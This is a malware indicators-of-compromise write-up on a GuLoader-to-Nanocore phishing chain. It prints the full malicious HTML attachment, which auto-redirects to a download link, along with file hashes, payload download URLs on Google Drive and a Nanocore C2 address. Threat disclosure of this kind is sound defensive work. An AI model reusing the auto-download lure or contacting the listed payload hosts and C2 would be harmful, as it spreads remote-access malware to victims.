2020-03-20 GuLoader_Nanocore IOCs

1. Email with file attachment named: #08492.html
2. #08492.html --> #08492.zip --> #0844.IMG --> #0844.exe --> SINSINCITY_encrypted_3280000.bin
3.  
4. #08492.html
5. ===========
6. <html>
7. <head>
8. <title>#08492</title>
9. <script src="http://code.jquery.com/jquery-3.2.1.min.js"></script>
10. <script>
11. $(function() {
12. $('a[data-auto-download]').each(function(){
13. var $this = $(this);
14. setTimeout(function() {
15. window.location = $this.attr('href');
16. }, 2000);
17. });
18. });
19. </script>
20. </head>
21. <body>
22. <center><img src="https://the.earth.li/~sgtatham/putty/latest/w32/psftp.exe"></center></img>
23. <div class="wrapper">
24. <p>
25. <a data-auto-download href="https://www.sendspace.com/pro/dl/izzu4h"</a>.</p>
26. </div>
27. </body>
28. </html>
29.  
30.  
31. Downloads:
32. ==========
33. First download:
34. psftp.exe (downloaded by first URL - probably legit Putty suite)
35. bc59fa5dbb11f5d286fc41e8f25c6cc0
36.  
37. Second download:
38. #08492.zip
39. 9bc2cefa6128b6187c0d9cecde5ce608
40.  
41. Which contains:
42. https://www.virustotal.com/gui/file/ac8745e4fee242c12d6692c4c92adaec467f06aa0285e67018ee00dae717d2dd/detection
43. #0844.IMG
44. 817788f932f5f5015adfff61767fb38f
45.  
46. Which contains (this should be the GuLoader file):
47. https://www.virustotal.com/gui/file/cd840d5ce4befb95f4ee4fdfd2bc312baa6983aebe52a127042dba03a3579576/detection
48. #0844.exe
49. 6458cae5ef3ffe2de7fdab0c43f49f1c
50.  
51. Running the .exe downloads:
52. https://drive.google.com/uc?export=download&id=1GHOBK1Y7MK13OpaHE25g6GvKcZvwaSSq
53.  
54. https://doc-0o-5s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9eo36211iggnk2iei9m347crmqbo86j9/1584719025000/01552400289149162477/*/1GHOBK1Y7MK13OpaHE25g6GvKcZvwaSSq?e=download
55.  
56. Which downloads: (this should be the encoded Nanocore file):
57. SINSINCITY_encrypted_3280000.bin
58. b9b1e5661689775a1fd2825ad98d36ba
59.  
60. Nanocore C2:
61. 207.246.72.237:8806